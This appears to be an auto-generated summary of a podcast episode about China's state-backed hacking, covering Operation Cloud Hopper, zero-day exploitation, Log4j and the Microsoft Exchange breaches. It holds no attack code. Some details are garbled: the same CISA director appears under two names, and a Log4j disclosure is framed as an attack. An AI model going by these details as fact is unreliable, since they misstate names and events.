To Catch a Thief: China’s Rise to Cyber Supremacy – Episode 6: The Gunslingers

Release Date: April 14, 2025
Produced by Rubrik in partnership with Pod People
Host: Nicole Perlroth

1. Introduction

In Episode 6, titled "The Gunslingers," host Nicole Perlroth delves deep into the sophisticated evolution of Chinese cyber operations. This episode explores how China transitioned from employing rudimentary hackers to cultivating elite cyber operatives capable of executing highly strategic and stealthy attacks on global targets. Perlroth interviews cybersecurity experts and insiders to uncover the motivations and methodologies behind China's ascent to cyber supremacy.

2. The Digital Ceasefire and Strategic Consolidation

Perlroth opens the episode by setting the stage of an 18-month digital calm, which initially gave the impression that Chinese cyberattacks had subsided. However, this tranquility was deceptive. She explains, “In retrospect, it appears the PRC carefully studied the Snowden documents, got a look at the NSA signals intelligence, and asked, how do we get that?” (00:08)

During this period, the Chinese Communist Party (CCP) established the Standing Cyber Committee, aiming to emulate and innovate upon U.S. cyber operations. Contrary to the perceived ceasefire, China was actively consolidating its cyber capabilities by unifying disparate People's Liberation Army (PLA) hacking units under the newly formed Strategic Support Force, mirroring the structure of the U.S. Cyber Command.

3. Emergence of Elite MSS Hackers

A pivotal shift occurred when responsibilities for sensitive cyber operations were transferred from the PLA to the Ministry of State Security (MSS). Perlroth describes the MSS as “a sort of combination of the FBI and NSA,” responsible for both domestic and international espionage. Unlike the PLA, the MSS outsourced its most critical operations to elite hackers across China, often disguised as cybersecurity firms.

"These hackers were no longer blasting into the building and announcing their presence," Perlroth notes, highlighting the stealthy nature of these new operatives (00:08).

John Holtquist, Mandiant's Chief Analyst, emphasizes the heightened operational security:
"They are now far more focused on their operational security, laying low, making it much harder for us to attribute them." (03:00)

4. Shift to Operational Security and Sophistication

Before 2015, Chinese Advanced Persistent Threats (APTs) were relatively easy to identify due to their simplistic tactics and lack of sophisticated techniques. Perlroth recounts, “Before 2015, attributing Chinese APTs by their attack style... was a fairly straightforward practice.” (03:10)

However, by late 2016, this dynamic had dramatically changed. Kevin Mandia of Mandiant observes:
"We used to be able to bucketize the forensics... and rarely would you see a Chinese APT deploy advanced techniques or custom code." (03:35)

The evolution was marked by a surge in varied and innovative attack methods, making attribution increasingly challenging.

5. Operation Cloud Hopper: Exploiting MSPs Globally

One of the first indicators of China's enhanced cyber prowess was Operation Cloud Hopper, a coordinated campaign targeting Managed Service Providers (MSPs) worldwide. By compromising MSPs, Chinese hackers could infiltrate thousands of their clients' networks simultaneously.

Perlroth details the extensive reach of these operations:
"They'd taken Rio Tinto's prospecting secrets and sensitive health research from Philips... They even managed to slip into NASA's Jet Propulsion Lab." (04:02)

Steve Stone, a cybersecurity expert, reflects on the sophistication of these attacks:
"They were able to go after only what they needed to... The gunslingers were incredibly hard to get out because we never knew what they were capable of." (09:08)

6. The Zero Day Arms Race

A critical aspect of China's cyber strategy is the exploitation and accumulation of zero day exploits—undisclosed vulnerabilities in software that can be leveraged for cyberattacks. Perlroth explains zero days as:
"They are holes in the foundation of a system... Once it's found, programmers have had zero days to fix it." (10:03)

Initially rare in Chinese APT attacks, the use of zero days surged dramatically post-2015. Kevin Mandia highlights this explosion:
"We had 32 zero days in 2019 exploited in the wild... In 2021, we hit 81." (13:11)

This unprecedented increase underscores China's intensified focus on developing and deploying zero day exploits.

7. China's Control Over Zero Days

Unlike Western counterparts, where zero days are often developed in-house or purchased on gray markets, China mandates that all zero day discoveries be handed over to the state. Perlroth elaborates:
"In China, the CCP can simply force hackers to turn them over for free... they started forcing China's hackers to turn over their best finds." (16:23)

Jim Lewis, a China cyber liaison, explains the internal pressure on Chinese hackers:
"They were invited to drink tea at the local cop shop... It suggested to them that it's their patriotic duty to give Uncle Xi their hacking tools for free." (16:23)

This state-controlled approach effectively eliminates the gray market for zero days within China, consolidating cyber capabilities under government oversight.

8. High-Profile Zero Day Incidents

The episode recounts significant zero day incidents that exemplify China's cyber tactics:

• Alibaba Incident (December 2021): A Chinese security engineer at Alibaba disclosed a severe zero day in the open-source library Log4j, leading to widespread vulnerabilities. Jenny Stirly, former director of the US Cyber Defense Agency CISA, called it “the most serious vulnerability” she had encountered (18:55).

• Microsoft Exchange Attacks (2019-2021): Chinese hackers exploited zero days in Microsoft Exchange servers, granting them covert access to sensitive information across millions of systems. John Holtquist describes the breach as “the most aggressive operation” he'd seen from China (22:43).

These incidents illustrate the scale and impact of China's zero day exploitation, affecting critical infrastructure and leading to unprecedented government responses.

9. Government Responses and Policy Implications

In response to the severity of these cyberattacks, the U.S. government took unprecedented measures. Following the Microsoft Exchange breach, the Justice Department authorized one of the broadest FBI search warrants ever, allowing the FBI to covertly patch and remove backdoors from infected systems.

While controversial, Jenny Stirly notes, “Everyone should assume that they are exposed and vulnerable now.” (18:55) This incident sparked a reevaluation of cybersecurity policies and underscored the need for robust defenses against state-sponsored cyber threats.

Kevin Mandia comments on the escalating cyber aggression:
"China has brought the A game and they've changed... their techniques are far more innovative and improved than even three years ago." (25:46)

10. Broader Geopolitical Context and Future Threats

The episode connects China's cyber aggression to broader geopolitical developments, notably Russia's cyberattacks on Ukraine's power grid. These attacks marked a shift from clandestine operations to overt aggression, signaling a new era in cyber warfare.

Jen Easterly, former director of CISA, emphasizes the deterrence implications:
"The defense of Ukraine is the deterrence of China... it's about holding US critical infrastructure at risk to deter our ability to marshal military might and citizen will." (29:13)

Experts express concern over China's potential to execute similar cyberattacks on U.S. critical infrastructure, envisioning scenarios where multiple sectors—such as energy, water, and communications—could be simultaneously disrupted. An unnamed expert speculates on “an everything everywhere all at once scenario” where a major cyberattack could incapacitate numerous services across the American landscape (30:50).

11. Conclusion

Episode 6, "The Gunslingers," provides a comprehensive exploration of China's advanced cyber operations and their implications for global security. Through detailed accounts and expert insights, Perlroth illuminates the strategic maneuvers that have positioned China as a dominant cyber power. The episode serves as a stark reminder of the evolving threats in the digital realm and the pressing need for international vigilance and robust cybersecurity measures.

Notable Quotes:

• “They are now far more focused on their operational security, laying low, making it much harder for us to attribute them.”
  — John Holtquist, Mandiant's Chief Analyst (03:00)

• “We used to be able to bucketize the forensics... and rarely would you see a Chinese APT deploy advanced techniques or custom code.”
  — Kevin Mandia, Mandiant (03:35)

• “This was the most aggressive operation... You essentially left a door open on millions of systems.”
  — John Holtquist, Mandiant (22:44)

• “The log4j vulnerability is the most serious vulnerability that I have seen in my decades long career.”
  — Jenny Stirly, Former Director of CISA (18:55)

• “China has brought the A game and they've changed... their techniques are far more innovative and improved.”
  — Kevin Mandia, Mandiant (25:46)

Production Credits:

Written and Produced by Nicole Perlroth and Rebecca Chasson
Additional Thanks: Hannah Pedersen, Sam Gabauer, and Amy Machado
Editing and Sound Design: Morgan Foose and Carter Wogan

For more insights into China's cyber strategies and their global implications, listen to the full episode of "To Catch a Thief: China’s Rise to Cyber Supremacy."